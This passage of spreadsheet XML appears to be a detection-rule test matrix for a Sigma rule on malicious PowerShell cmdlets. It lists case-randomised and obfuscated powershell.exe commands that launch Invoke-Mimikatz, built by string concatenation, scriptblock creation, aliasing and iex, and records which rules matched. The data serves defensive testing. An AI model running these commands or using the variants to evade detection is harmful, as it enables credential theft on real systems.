        </is>
      </c>
      <c r="J738" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K738" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1" s="42">
      <c r="A739" s="43" t="n"/>
      <c r="B739" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C739" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D739" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E739" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H739" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I739" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J739" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K739" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1" s="42">
      <c r="A740" s="43" t="n"/>
      <c r="B740" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C740" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D740" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E740" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F740" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G740" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H740" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I740" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J740" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K740" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1" s="42">
      <c r="A741" s="43" t="n"/>
      <c r="B741" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C741" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D741" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E741" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F741" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G741" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H741" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I741" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J741" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K741" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1" s="42">
      <c r="A742" s="43" t="n"/>
      <c r="B742" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C742" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D742" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E742" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F742" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G742" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H742" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I742" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J742" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K742" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1" s="42">
      <c r="A743" s="43" t="n"/>
      <c r="B743" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C743" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D743" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E743" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F743" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G743" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H743" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I743" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J743" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K743" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1" s="42">
      <c r="A744" s="43" t="n"/>
      <c r="B744" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C744" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D744" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E744" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F744" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G744" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H744" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I744" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J744" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K744" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1" s="42">
      <c r="A745" s="43" t="n"/>
      <c r="B745" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C745" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D745" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E745" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F745" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G745" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H745" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I745" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J745" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K745" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1" s="42">
      <c r="A746" s="43" t="n"/>
      <c r="B746" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C746" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D746" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E746" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F746" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G746" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H746" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I746" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J746" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K746" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1" s="42">
      <c r="A747" s="43" t="n"/>
      <c r="B747" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C747" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D747" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E747" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H747" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I747" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J747" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K747" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1" s="42">
      <c r="A748" s="43" t="n"/>
      <c r="B748" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C748" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D748" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E748" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H748" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I748" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J748" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K748" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1" s="42">
      <c r="A749" s="43" t="n"/>
      <c r="B749" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C749" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D749" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E749" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F749" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G749" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H749" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I74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49" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K749" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1" s="42">
      <c r="A750" s="43" t="n"/>
      <c r="B750" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C750" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D750" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E750" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F750" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G750" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H750" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75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50" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K750" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1" s="42">
      <c r="A751" s="43" t="n"/>
      <c r="B751" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C751" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D751" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E751" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F751" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G751" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H751" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75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51" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K751" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1" s="42">
      <c r="A752" s="43" t="n"/>
      <c r="B752" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C752" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D752" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E752" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F752" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G752" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H752" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75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52" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K752" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1" s="42">
      <c r="A753" s="43" t="n"/>
      <c r="B753" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C753" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D753" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E753" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H753" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I753" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J753" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K753" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1" s="42">
      <c r="A754" s="43" t="n"/>
      <c r="B754" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C754" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D754" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E754" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H754" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I754" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J754" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K754" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1" s="42">
      <c r="A755" s="43" t="n"/>
      <c r="B755" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C755" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D755" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E755" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H755" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I755" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J755" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K755" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1" s="42">
      <c r="A756" s="43" t="n"/>
      <c r="B756" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C756" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D756" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E756" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F756" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G756" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H756" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I756" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J756" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K756" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1" s="42">
      <c r="A757" s="43" t="n"/>
      <c r="B757" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C757" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D757" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E757" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F757" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G757" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H757" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I757" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J757" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K757" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1" s="42">
      <c r="A758" s="43" t="n"/>
      <c r="B758" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C758" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D758" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E758" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F758" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G758" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H758" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75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58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K758" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1" s="42">
      <c r="A759" s="43" t="n"/>
      <c r="B759" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C759" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D759" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E759" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F759" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G759" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H759" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7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59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K759" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1" s="42">
      <c r="A760" s="43" t="n"/>
      <c r="B760" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C760" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D760" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E760" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F760" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G760" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H760" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K760" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1" s="42">
      <c r="A761" s="43" t="n"/>
      <c r="B761" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C761" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D761" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E761" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F761" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G761" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H761" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K761" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1" s="42">
      <c r="A762" s="43" t="n"/>
      <c r="B762" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C762" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D762" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E762" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I7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2" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K762" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1" s="42">
      <c r="A763" s="36" t="n"/>
      <c r="B763" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C763" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D763" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E763" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I76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3" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K763" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1" s="42">
      <c r="A764" s="43" t="n"/>
      <c r="B764" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C764" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D764" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E764" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I7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4" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K764" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1" s="42">
      <c r="A765" s="36" t="n"/>
      <c r="B765" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
